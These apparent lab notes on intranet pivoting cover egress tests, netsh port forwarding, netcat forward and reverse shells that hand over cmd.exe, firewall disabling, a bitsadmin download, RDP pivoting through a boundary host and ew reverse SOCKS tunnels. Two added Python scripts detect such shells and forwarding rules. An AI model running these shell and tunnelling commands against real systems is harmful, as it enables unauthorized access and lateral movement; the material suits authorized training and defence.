1. Detecting which outbound protocols an intranet server can use
Windows
1. ICMP egress test
Ping the IP address of your own VPS.
2. DNS egress test
ping www.baidu.com
nslookup www.baidu.com
3. TCP egress test
telnet vps-ip
2. nc
Attacker machine: nc -lvvp 4444
Victim machine: nc vps-ip 4444
3. bitsadmin (HTTP download)
bitsadmin /rawreturn /transfer down "http://120.79.66.58/1.gif" d:\1.txt
4. PowerShell port check
powershell -exec bypass -Command "Import-Module .\telnet.ps1; Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP"
2. Building a protocol tunnel
1. netsh port forwarding
netsh is a built-in Windows tool for managing network configuration and the firewall. Incoming TCP connections can be forwarded through netsh to a port on the local computer or on a remote one.
It requires administrative rights.
netsh interface portproxy show all    View the existing forwarding rules
netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port    Add an IPv4-to-IPv4 port mapping
netsh interface portproxy delete v4tov4 listenport=port    Delete the specified forwarding rule
netsh advfirewall show allprofiles    View the firewall status of all network profiles on the current system
netsh advfirewall set allprofiles state off    Turn off the system firewall
netsh advfirewall set allprofiles state on    Turn on the system firewall
Creating a forward shell:
1. Add a firewall rule allowing inbound TCP access to port 4444
name: the rule name (any string); dir: direction; action: allow or block; protocol: the protocol; localport: the local port
netsh advfirewall firewall add rule name="nc in" dir=in action=allow protocol=TCP localport=4444
2. Upload netcat-win32-1.12.zip to the target machine, change into its directory, and run nc.exe -lvp 4444 -e cmd.exe
3. On the attacker machine run nc64.exe -nv 192.168.206.129 4444 to obtain the forward shell
Creating a reverse shell:
Attacker machine
1. Add a firewall rule on the attacker machine opening port 4443
netsh firewall add portopening TCP 4443 "nc reverse shell"
2. Listen on port 4443 on the attacker machine: nc64.exe -lvp 4443
Target machine
3. Add a firewall rule on the target machine allowing TCP on port 4443 outbound
netsh advfirewall firewall add rule name="nc reverse shell" dir=out action=allow protocol=TCP localport=4443
4. Use the previously uploaded nc on the target machine to connect to port 4443 of the attacker machine
nc64.exe -nv 192.168.206.1 4443 -e cmd.exe
5. Receive the target machine's shell on the attacker machine
6. Although the connection is established, there is no output and commands cannot be executed
7. After investigating step by step, it turns out the victim machine is 64-bit, so nc64.exe must be used instead of nc.exe
8. The attacker now has the victim's shell
In the netstat output you can see that the victim machine used local port 49169 to establish the connection to port 4443 of the attacker machine: ESTABLISHED, PID 2560
CLOSE_WAIT means the remote side closed the connection, or the network failed and the connection was interrupted
9. tasklist /svc | findstr "2560" looks up the PID and shows that the connection belongs to nc64.exe
10. wmic process queries detailed process information
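As an added example that is not part of these notes, the Python script below automates the PID-to-process check that steps 8 and 9 perform by hand with netstat and findstr: it parses `netstat -ano` and `tasklist /svc` output, joins the two on PID, and reports ESTABLISHED or CLOSE_WAIT connections whose owning process is on a watchlist of tunnel/shell tools or which talk to a remote port outside an allowlist. Both sample outputs are constructed to mirror the tools' layouts (the nc64.exe row reuses the page's values: local port 49169, remote port 4443, PID 2560); the watchlist and the allowed-port set are assumptions to tune per environment.

```python
"""Correlate `netstat -ano` with `tasklist /svc` to find which process owns each
established outbound connection, the check the page does by hand with findstr.

Both sample outputs are constructed here to mirror the two tools' layouts; the
nc64.exe row reuses the page's values (local port 49169, remote port 4443, PID 2560).
"""
import re
from dataclasses import dataclass

NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    192.168.206.129:49169  192.168.206.1:4443     ESTABLISHED     2560
  TCP    192.168.206.129:49170  192.168.206.1:80       CLOSE_WAIT      1888
  UDP    0.0.0.0:5355           *:*                                    1020
"""

TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    704 RpcSs
explorer.exe                  1888 N/A
nc64.exe                      2560 N/A
"""

# Assumption: process names that are almost never legitimate socket owners on a server.
WATCHLIST = {"nc.exe", "nc64.exe", "ncat.exe", "ew.exe"}
# Assumption: remote ports this host is expected to talk to (constructed allowlist).
ALLOWED_REMOTE_PORTS = {53, 80, 443, 445, 3389}


@dataclass(frozen=True)
class Connection:
    proto: str
    local: str
    remote: str
    state: str   # empty string for UDP rows, which carry no State column
    pid: int


# UDP rows have no State column, hence the optional group before the PID.
NETSTAT_ROW = re.compile(r"^(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)$")
# Image names may contain spaces ("System Idle Process"), so match lazily up to the PID.
TASKLIST_ROW = re.compile(r"^(.+?)\s+(\d+)\s+(.*)$")


def parse_netstat(text):
    """Return a Connection for every TCP/UDP row of `netstat -ano` output."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line.strip())
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append(Connection(proto, local, remote, state or "", int(pid)))
    return conns


def parse_tasklist(text):
    """Return {pid: (image_name, services)} from `tasklist /svc` output."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_ROW.match(line.rstrip())
        if m:
            image, pid, services = m.groups()
            procs[int(pid)] = (image.strip(), services.strip())
    return procs


def flag_outbound(netstat_text, tasklist_text,
                  watchlist=WATCHLIST, allowed_ports=ALLOWED_REMOTE_PORTS):
    """Join connections to their owning process and report the suspicious ones.

    ESTABLISHED and CLOSE_WAIT are both examined: CLOSE_WAIT means the remote side
    already closed, so it can still reveal a tool that has just finished talking out.
    """
    procs = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        if c.state not in ("ESTABLISHED", "CLOSE_WAIT"):
            continue
        image, services = procs.get(c.pid, ("<unknown>", ""))
        remote_port = int(c.remote.rsplit(":", 1)[1])
        reasons = []
        if image.lower() in watchlist:
            reasons.append(f"image {image} is on the tunnel/shell tool watchlist")
        if remote_port not in allowed_ports:
            reasons.append(f"remote port {remote_port} is not an expected service port")
        if reasons:
            findings.append({"pid": c.pid, "image": image, "services": services,
                             "local": c.local, "remote": c.remote,
                             "state": c.state, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_outbound(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {f['pid']} ({f['image']}) {f['local']} -> {f['remote']} [{f['state']}]")
        for r in f["reasons"]:
            print("   ", r)
```

On a live host, pipe the real command output into the two parsers instead of the constructed samples; the join on PID is exactly what tasklist /svc | findstr "2560" gives you, only for every connection at once.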
Forwarding a DMZ server's port
Boundary machine
1. Add a firewall rule on the boundary machine allowing inbound connections to port 8888
netsh advfirewall firewall add rule name="3389 test" dir=in action=allow protocol=TCP localport=8888
2. Add a portproxy rule forwarding the attacker's traffic to port 8888 of the boundary machine on to port 3389 of the DMZ host
netsh interface portproxy add v4tov4 listenport=8888 connectaddress=192.168.52.129 connectport=3389
3. Check the forwarding rules
netsh interface portproxy show all
(To delete the forwarding rule: netsh interface portproxy delete v4tov4 listenport=8888)
4. Check that the boundary machine is listening on port 8888
Attacker machine
The only step on the attacker machine is to open a Remote Desktop session to port 8888 of the boundary machine
This logs in to the Windows Server 2003 host in the DMZ
192.168.206.129 is the IP address of the Win7 boundary machine
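Added example, not part of the original notes: a Python audit of `netsh interface portproxy show all` output, the check a defender would run on a boundary host to find forwarding rules like the one built above (and any created with the generic portproxy commands from the netsh section). It parses the listing, flags rules whose listener is reachable from the network and whose destination is another host or a high-value service port, and builds the matching netsh delete command. The sample output is constructed to mirror netsh's layout, with the first rule reusing the page's values (8888 -> 192.168.52.129:3389); HIGH_VALUE_PORTS is an assumed list.

```python
"""Audit `netsh interface portproxy show all` output for forwarding rules that expose
internal hosts, the pivot the page builds on the boundary machine.

The sample output is constructed to mirror netsh's layout; the first rule reuses the
page's values (listen 8888 -> 192.168.52.129:3389), the second is an extra loopback rule.
"""
import ipaddress
import re
from dataclasses import dataclass

PORTPROXY_SAMPLE = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               8888        192.168.52.129  3389
127.0.0.1       2222        127.0.0.1       8080
"""

# Assumption: service ports whose exposure through a proxy deserves a second look.
HIGH_VALUE_PORTS = {22: "SSH", 445: "SMB", 3389: "RDP", 5985: "WinRM"}


@dataclass(frozen=True)
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int


# Data rows are "addr port addr port"; header and dash lines never have a numeric 2nd column.
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text):
    """Return every v4tov4 rule printed by `netsh interface portproxy show all`."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            la, lp, ca, cp = m.groups()
            rules.append(PortProxyRule(la, int(lp), ca, int(cp)))
    return rules


def _is_local(addr):
    """True for loopback addresses; '*' and 0.0.0.0 (all interfaces) are not local."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return addr.lower() == "localhost"


def assess(rule):
    """Return the reasons a rule looks like a pivot, or [] if it looks benign."""
    reasons = []
    if not _is_local(rule.listen_addr) and not _is_local(rule.connect_addr):
        reasons.append("listener reachable from the network forwards to another host")
    if rule.connect_port in HIGH_VALUE_PORTS:
        reasons.append(f"destination is {HIGH_VALUE_PORTS[rule.connect_port]} "
                       f"(port {rule.connect_port})")
    return reasons


def removal_command(rule):
    """Build the netsh command that deletes the rule (listenaddress is a real netsh parameter)."""
    cmd = f"netsh interface portproxy delete v4tov4 listenport={rule.listen_port}"
    if rule.listen_addr != "*":
        cmd += f" listenaddress={rule.listen_addr}"
    return cmd


def audit(text):
    """Return [(rule, reasons, removal_command)] for every rule that raised a reason."""
    return [(r, assess(r), removal_command(r))
            for r in parse_portproxy(text) if assess(r)]


if __name__ == "__main__":
    for rule, reasons, fix in audit(PORTPROXY_SAMPLE):
        print(f"{rule.listen_addr}:{rule.listen_port} -> {rule.connect_addr}:{rule.connect_port}")
        for r in reasons:
            print("   ", r)
        print("    remove with:", fix)
```

The rule from the notes is flagged twice (network-facing listener forwarding to another host, and the destination is RDP), while the loopback-to-loopback rule passes; the generated delete command is the same one the notes give for undoing the forward.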
iptables port forwarding
Public IP test (not finished; retried daily)
(My VPS is 64-bit; I searched for ew and thought there was no 64-bit Linux build, which was embarrassing.)
1. View the VPS's open ports
firewall-cmd --list-ports
2. Open ports 6666 and 6667
firewall-cmd --zone=public --add-port=6666/tcp --permanent
firewall-cmd --zone=public --add-port=6667/tcp --permanent
3. Restart the firewall
4. Check that the ports were opened successfully
5. The VPS listens on ports 6666 and 6667; the attacker machine connects to port 6666 and the target machine connects to port 6667.
./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &
Reverse SOCKS5 server
Attacker machine: Win7
Target machine: Windows Server 2003
1. Listen on ports 1080 and 888 on the attacker machine
2. On the target machine
3. The connection is established on the attacker machine
4. Use SocksCap6 for the subsequent penetration